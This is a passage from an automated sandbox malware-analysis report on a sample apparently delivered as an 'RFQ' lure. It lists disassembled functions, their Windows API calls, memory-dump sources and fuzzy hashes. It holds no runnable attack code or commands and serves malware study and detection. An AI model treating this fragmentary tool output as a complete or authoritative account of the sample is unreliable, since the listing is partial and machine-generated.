                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EF77E7
                    • SelectObject.GDI32(00000000,00000000), ref: 00EF77EF
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EF77FA
                    • DeleteDC.GDI32(00000000), ref: 00EF7803
                    • GetWindowLongW.USER32(?,000000EC), ref: 00EF780D
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EF7821
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EF782D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: 9431347d6897b2ec028cc8ba4a76e374c0d614f048b6a94ed2a864b40fe533e9
                    • Instruction ID: a72b631b7c2bc06bc4d2c2cc66c72d72d778e0b3bcce595f20384ba73dc64c1c
                    • Opcode Fuzzy Hash: 9431347d6897b2ec028cc8ba4a76e374c0d614f048b6a94ed2a864b40fe533e9
                    • Instruction Fuzzy Hash: 70318A32105219BFDF119FA5DC08FEA3B69EF89365F110225FA55B61A0CB31D821DBA4
                    Function 00E97040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E9707B
                      • Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68
                    • __gmtime64_s.LIBCMT ref: 00E97114
                    • __gmtime64_s.LIBCMT ref: 00E9714A
                    • __gmtime64_s.LIBCMT ref: 00E97167
                    • __allrem.LIBCMT ref: 00E971BD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E971D9
                    • __allrem.LIBCMT ref: 00E971F0
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E9720E
                    • __allrem.LIBCMT ref: 00E97225
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E97243
                    • __invoke_watson.LIBCMT ref: 00E972B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction ID: 12bfc89b30320ef25891bfabd4c2ab489838032ebe219717e79482128fde77fc
                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction Fuzzy Hash: FF7108B1A18706ABDB149F79CC41B5AB3E8AF55324F14523AF454FB2C1E770EA048790
                    Function 00ED2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00ED2A31
                    • GetMenuItemInfoW.USER32(00F36890,000000FF,00000000,00000030), ref: 00ED2A92
                    • SetMenuItemInfoW.USER32(00F36890,00000004,00000000,00000030), ref: 00ED2AC8
                    • Sleep.KERNEL32(000001F4), ref: 00ED2ADA
                    • GetMenuItemCount.USER32(?), ref: 00ED2B1E
                    • GetMenuItemID.USER32(?,00000000), ref: 00ED2B3A
                    • GetMenuItemID.USER32(?,-00000001), ref: 00ED2B64
                    • GetMenuItemID.USER32(?,?), ref: 00ED2BA9
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00ED2BEF
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2C03
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2C24
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: 15e837262acc33d2caea96ce032676115f6b48cfdaf7de210e491d3f440049d7
                    • Instruction ID: 08b69baa2396e07741d32cf4a09340a522ada879f22b4e8964d80a93d26ed903
                    • Opcode Fuzzy Hash: 15e837262acc33d2caea96ce032676115f6b48cfdaf7de210e491d3f440049d7
                    • Instruction Fuzzy Hash: DE618EB0900249AFDB21CF64CC88DBEBBB9EB61308F14555EEA51B7351D771AD06DB20
                    Function 00EF7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EF7214
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EF7217
                    • GetWindowLongW.USER32(?,000000F0), ref: 00EF723B
                    • _memset.LIBCMT ref: 00EF724C
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EF725E
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EF72D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 9c3b4abba9bf910705a01a0b162f5443205b6f480c9262694018d13d511bbacf
                    • Instruction ID: 98d2ef841e450110b2fc715511af47fbbb1c2e731810ceb59222ad198ce76166
                    • Opcode Fuzzy Hash: 9c3b4abba9bf910705a01a0b162f5443205b6f480c9262694018d13d511bbacf
                    • Instruction Fuzzy Hash: 03615971A00208AFDB20DFA4CC81EEE77F9AF09714F144199FA54E72A1D770AD45DB60
                    Function 00EC710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00EC7135
                    • SafeArrayAllocData.OLEAUT32(?), ref: 00EC718E
                    • VariantInit.OLEAUT32(?), ref: 00EC71A0
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00EC71C0
                    • VariantCopy.OLEAUT32(?,?), ref: 00EC7213
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00EC7227
                    • VariantClear.OLEAUT32(?), ref: 00EC723C
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00EC7249
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC7252
                    • VariantClear.OLEAUT32(?), ref: 00EC7264
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC726F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: e42a0acac0697d3ade1af5c37876d3bd97f62c1b3a7b1116fd9416ef011b5a05
                    • Instruction ID: c98c9f589dab989b422a99f54e17eb75f4ac2f2052a18c5727b5b8758731852d
                    • Opcode Fuzzy Hash: e42a0acac0697d3ade1af5c37876d3bd97f62c1b3a7b1116fd9416ef011b5a05
                    • Instruction Fuzzy Hash: 9E416D71A00219AFCB04DF65D948EAEBBB8FF48354F008069F955B7261CB31A94ACF90
                    Function 00EE5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • WSAStartup.WSOCK32(00000101,?), ref: 00EE5AA6
                    • inet_addr.WSOCK32(?), ref: 00EE5AEB
                    • gethostbyname.WSOCK32(?), ref: 00EE5AF7
                    • IcmpCreateFile.IPHLPAPI ref: 00EE5B05
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE5B75
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE5B8B
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EE5C00
                    • WSACleanup.WSOCK32 ref: 00EE5C06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: a90e7a9419854c3722cc9336c05e50929dc3b2cfb36385d3bfdae5d845f8f908
                    • Instruction ID: d093cf8b52408801ad521f7587c772b300c696cee71e3a46fc153f46735fe7ff
                    • Opcode Fuzzy Hash: a90e7a9419854c3722cc9336c05e50929dc3b2cfb36385d3bfdae5d845f8f908
                    • Instruction Fuzzy Hash: 4C51B1326047009FDB10AF26CC45B2AB7E0EF84318F14992AF559FB2A1DB70E800CF52
                    Function 00EDB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EDB73B
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EDB7B1
                    • GetLastError.KERNEL32 ref: 00EDB7BB
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00EDB828
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: 720a9e6923aec9788a30bc4f18adaacfc2916452b47b4038e6fb3058554a1cee
                    • Instruction ID: acfeacb450a53fa58db09abd8a2348503575e4a8a660c4a825a220fd267e1f05
                    • Opcode Fuzzy Hash: 720a9e6923aec9788a30bc4f18adaacfc2916452b47b4038e6fb3058554a1cee
                    • Instruction Fuzzy Hash: 59319C35A00209DFDB00EF64D885AFE7BB8EF84704F11912BE506F7392EB719942DA51
                    Function 00EC9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EC94F6
                    • GetDlgCtrlID.USER32 ref: 00EC9501
                    • GetParent.USER32 ref: 00EC951D
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC9520
                    • GetDlgCtrlID.USER32(?), ref: 00EC9529
                    • GetParent.USER32(?), ref: 00EC9545
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EC9548
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 00b31e976c1bf0f6ad94e254f8f8360c81797f69a69bd0d3985ca143bb472560
                    • Instruction ID: 46be8086737b162e3a3614e4eb83d5f89ebd326d12756a759ad28b97895518bc
                    • Opcode Fuzzy Hash: 00b31e976c1bf0f6ad94e254f8f8360c81797f69a69bd0d3985ca143bb472560
                    • Instruction Fuzzy Hash: 6421B270A00104AFCF05AB65CCC5EFEBBA4EF85300F105129F561A72A2DB75991ADA60
                    Function 00EC955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EC95DF
                    • GetDlgCtrlID.USER32 ref: 00EC95EA
                    • GetParent.USER32 ref: 00EC9606
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC9609
                    • GetDlgCtrlID.USER32(?), ref: 00EC9612
                    • GetParent.USER32(?), ref: 00EC962E
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EC9631
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 8d0c7f0e8329cd05af796c0dd25ffd8595234e4393ad806890ea536af78fd6e7
                    • Instruction ID: 2a926d6013b9ea8e94e4d4cb71cc429a5762e23173e13ec5c8f8468229b54f8b
                    • Opcode Fuzzy Hash: 8d0c7f0e8329cd05af796c0dd25ffd8595234e4393ad806890ea536af78fd6e7
                    • Instruction Fuzzy Hash: 7121D675A00104BFDF04AB61CDC5EFEBBB4EF44300F105019F551A72E2DB75951ADA60
                    Function 00EC9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32 ref: 00EC9651
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00EC9666
                    • _wcscmp.LIBCMT ref: 00EC9678
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EC96F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: ed0cc67349659f421a9fcc2bf435e2be976860c1e0a65e6092cfc215a91116b9
                    • Instruction ID: ed76bc4ce7699344e0a07c639da930d4d9ba254edf61bc13e19365dc2209bc3a
                    • Opcode Fuzzy Hash: ed0cc67349659f421a9fcc2bf435e2be976860c1e0a65e6092cfc215a91116b9
                    • Instruction Fuzzy Hash: A911CA76248317BAFA012631ED1FEE6B7DC9F05764F20102AF900B50E2FE9399529559
                    Function 00EE8BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00EE8BEC
                    • CoInitialize.OLE32(00000000), ref: 00EE8C19
                    • CoUninitialize.OLE32 ref: 00EE8C23
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00EE8D23
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EE8E50
                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F02C0C), ref: 00EE8E84
                    • CoGetObject.OLE32(?,00000000,00F02C0C,?), ref: 00EE8EA7
                    • SetErrorMode.KERNEL32(00000000), ref: 00EE8EBA
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EE8F3A
                    • VariantClear.OLEAUT32(?), ref: 00EE8F4A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                    • String ID:
                    • API String ID: 2395222682-0
                    • Opcode ID: e0183cd0ed33918bc892d622e2d086c61a288ad6bb41f0af2fa7dc05be7dfb0a
                    • Instruction ID: d551765b782ee46ce7527f75a940ebfe4d2330a7cfe2accc1c69e562aefd4ec7
                    • Opcode Fuzzy Hash: e0183cd0ed33918bc892d622e2d086c61a288ad6bb41f0af2fa7dc05be7dfb0a
                    • Instruction Fuzzy Hash: 03C15371208349AFC704EF65C98492BB7E9FF88348F00592DF58AAB261DB71ED05CB52
                    Function 00ED4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                    Download Yara Rule
                    APIs
                    • __swprintf.LIBCMT ref: 00ED419D
                    • __swprintf.LIBCMT ref: 00ED41AA
                      • Part of subcall function 00E938D8: __woutput_l.LIBCMT ref: 00E93931
                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00ED41D4
                    • LoadResource.KERNEL32(?,00000000), ref: 00ED41E0
                    • LockResource.KERNEL32(00000000), ref: 00ED41ED
                    • FindResourceW.KERNEL32(?,?,00000003), ref: 00ED420D
                    • LoadResource.KERNEL32(?,00000000), ref: 00ED421F
                    • SizeofResource.KERNEL32(?,00000000), ref: 00ED422E
                    • LockResource.KERNEL32(?), ref: 00ED423A
                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00ED429B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                    • String ID:
                    • API String ID: 1433390588-0
                    • Opcode ID: 9607f12cb1d9a8dac6bf863694c13b0586e92340ff5327b1f747626c11977489
                    • Instruction ID: fc764626f86826e1fda586467d89c7ef3a065758cae950f73a5392fb9b5e941a
                    • Opcode Fuzzy Hash: 9607f12cb1d9a8dac6bf863694c13b0586e92340ff5327b1f747626c11977489
                    • Instruction Fuzzy Hash: 9531B0B160121AAFDB119FA1DC84EBF7BADEF14301F044526F801F62A0E730DA52DBA0
                    Function 00ED16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00ED1700
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED1714
                    • GetWindowThreadProcessId.USER32(00000000), ref: 00ED171B
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED172A
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ED173C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED1755
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED1767
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED17AC
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED17C1
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED17CC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: 6793be3b55c26a23c9f46d04df9def7cc2ad40119fe2668f927b9c42a1f46a74
                    • Instruction ID: c9ac544d49a89fc236690425e7e3aaed0fe23f31c3f6af17bdca9a0d8e61c81f
                    • Opcode Fuzzy Hash: 6793be3b55c26a23c9f46d04df9def7cc2ad40119fe2668f927b9c42a1f46a74
                    • Instruction Fuzzy Hash: 92319FB5600308BFDB21AF25DC84B7977AAEB56725F114097F800EA3A0DB71AD85DB90
                    Function 00E7FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                    Download Yara Rule
                    APIs
                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E7FC06
                    • OleUninitialize.OLE32(?,00000000), ref: 00E7FCA5
                    • UnregisterHotKey.USER32(?), ref: 00E7FDFC
                    • DestroyWindow.USER32(?), ref: 00EB4A00
                    • FreeLibrary.KERNEL32(?), ref: 00EB4A65
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EB4A92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
